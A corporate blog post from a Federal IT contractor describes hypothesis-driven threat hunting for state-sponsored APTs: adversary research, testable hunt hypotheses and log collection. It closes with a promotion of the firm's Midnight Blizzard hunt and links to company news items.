In today’s digital age, cyber threats are constantly evolving, and Federal agencies are particularly vulnerable to attacks by State-sponsored advanced persistent threats (APTs). The need for a quick and effective response against these attacks is critical to maintaining national security and protecting our critical infrastructure. 

Hunting for APTs is hard – period. Flush with resources, APTs employ arguably the most sophisticated and evasive tactics, techniques, and procedures (TTPs) to infiltrate and persist within a network. Leveraging highly customized and “low and slow” attack methods, along with advanced evasion techniques, APTs are adept at bypassing detection mechanisms and can persist in victim Agency networks for months or even years. Experts at employing “Living of the Land” TTPs, or abusing legitimate applications organic to the victim’s environment (i.e. PowerShell, WMI, RDP, LoLBins, etc.), APTs are able to blend in with normal-looking activity, making them especially difficult for security teams to discover. 

The right team understands these steep challenges and develops a thorough, proactive, and adaptable approach to discover and mitigate evolving cyber attacks from APTs. Using a combination of threat actor research, advanced hypotheses, and comprehensive data analysis, expert threat hunting teams can quickly uncover the threat and respond accordingly. 

Know your target. Critical to an effective threat hunt is understanding the nature and veracity of the target APTs attack methods. Once a triggering event has occurred, driving the operating assumption that a named APT could be in the victim network, threat hunters will immediately begin working to refine their knowledge of the tools and TTPs that could be in scope. This includes researching published open-source and classified threat intelligence, deep and dark web forums, and security whitepapers. Additionally, sophisticated threat hunters will review relevant incident response data and perform malware analysis and reverse engineering to reveal historical attack trends and patterns as well as expected indicators and artifacts that should be expected if the target APT has successfully compromised the victim environment. Combining this data, experienced hunters will reconstruct the APT’s kill chain using industry standards such as the Pyramid of Pain and the MITRE ATT&CK Framework, outlining an attack workflow that later guides the threat hunt hypotheses and operations. 

Tailor your hunt using hypotheses. Experienced threat hunters must assume that APTs are aware of the reported intelligence and detection methods used to find them and will only be discoverable by looking for evidence of APT TTPs based on well crafted hypotheses. A hunt hypothesis is a testable statement that outlines the indicators or artifacts that must be present if the target APT was successful in their attack. A strong hunt hypothesis will define the scope of the hunt, including the systems, network segments, or data sources to be analyzed. It should also consider the context of the environment, such as the Agency’s mission and operations, typical user behavior, and relevant security controls in place. Furthermore, the hypothesis should include criteria or conditions that must be met to confirm or refute the hypothesis. This could involve thresholds for anomaly detection, correlation with known IOCs, or validation through manual investigation. 

Ensure visibility with the right data. Collecting the right data is essential, and without it, threat hunters are blind. For timely threat discovery and response, hunters must rapidly identify and ensure the collection and processing of a variety of data required to test their threat hunt hypotheses. Network traffic logs reveal patterns suggestive of APT activity, including unusual data transfers and command and control communications, while endpoint logs and artifacts offer insights into compromised devices and persistence mechanisms. System and application logs complement this by highlighting abnormal user behavior and authentication events. User and Entity Behavior Analytics (UEBA) data aids in identifying insider threats and compromised accounts. Collectively, these data sources empower threat hunters to proactively test their hypotheses and prove or disprove the presence of the targeted APT. 

At Edgewater, our recent threat hunt activities to discover Midnight Blizzard, a top-tier Russian government-backed APT, demonstrates our capability and agility. Recognizing the need to perform a hypothesis-driven ad hoc threat hunt to find evidence of compromise that may have evaded existing detections, our threat hunt team jumped into action. We understand the importance of a quick response against cyber attacks, and our expert threat hunt team stands ready to defend our Federal agency customers. Contact us to learn more about our approach to threat hunting, and how we can help protect your Federal organization. 

Back to All News

Further Reading

Revolutionizing Data with AI-Driven Tagging 

In the ever-evolving data management landscape, quickly finding and relating information is paramount. By harnessing the power of open-source AI […]

Case Study: Hunting for Midnight Blizzard to Safeguard a Global Scientific Research Organization

Dangerous organizations are becoming more emboldened in their cyberattacks. Armed with an arsenal of powerful malware tools, expertise of their […]

EDGEWATER ADDS BOB AMANI AS CHIEF TRANSFORMATION OFFICER

Frederick, Md. [December 11, 2024] — Edgewater Federal Solutions, Inc. (“Edgewater”), a leading enterprise IT, cybersecurity, and systems engineering provider […]

EDGEWATER APPOINTS TOM FERRANDO AS COMPANY CHIEF EXECUTIVE OFFICER

Frederick, Md. [December 4, 2024] – Edgewater Federal Solutions, Inc. (“Edgewater”), a leader in enterprise IT, cybersecurity, and systems engineering […]

Edgewater Federal Solutions Named to Inc.’s 2024 Best in Business List in IT Management for the Second Time

Frederick, Md. (December 3, 2024) – Edgewater Federal Solutions, Inc. (Edgewater), a leading enterprise IT, cybersecurity, and application development Government […]

Edgewater Named Elev8 GovCon Honoree for the 2nd Time

Frederick, Md. (October 8, 2024) – For the second year, Edgewater Federal Solutions, Inc. (Edgewater) is recognized as an OrangeSlices’ […]

Edgewater Federal Solutions to Be Featured on Trending Today on A&E

Frederick, MD – September 18, 2024 – Edgewater Federal Solutions, a leading provider of innovative IT and cyber solutions, is […]

For the 6th Time, Edgewater Makes the Inc. 5000  at No. 2297  

Frederick, Md. (August 13, 2024) – Inc. revealed today that Edgewater Federal Solutions, Inc. (Edgewater), a leading IT and cybersecurity […]

Edgewater Promotes Phillip Lopez to VP, General Manager

Frederick, Md. (August 8, 2024) – Today, Edgewater Federal Solutions, Inc. (Edgewater) proudly announces the promotion of Phillip Lopez to […]

Edgewater Promotes Chris Christianson to CISO 

Frederick, Md. (June 26, 2024) — Today, Edgewater Federal Solutions, Inc. (Edgewater) announces that Chris Christianson has been promoted to […]

For the 7th year, The Washington Post names Edgewater a 2024 Top Washington-area Workplace

Frederick, Md. (June 21, 2024) – Edgewater Federal Solutions, Inc. (Edgewater), a leading technology and cybersecurity federal contractor, has been […]

Our People…Your Edge

We didn’t create our outstanding team by accident.

Our advantage comes from a consistent focus on attracting highly talented and dedicated people – and a commitment to honoring and empowering them so that they stay. With meaningful work and industry-leading training, compensation, and benefits, Edgewater careers are enviable so that our people are our edge.

Working for Edgewater Federal Solutions for the past 5 years has renewed my belief that great companies still exist.   They value and recognize the employee and invest in our futures.  To anyone considering a career with Edgewater, if you enjoy a positive working environment with a company that values and recognizes its employees contributions come join us.

- Al Tornabene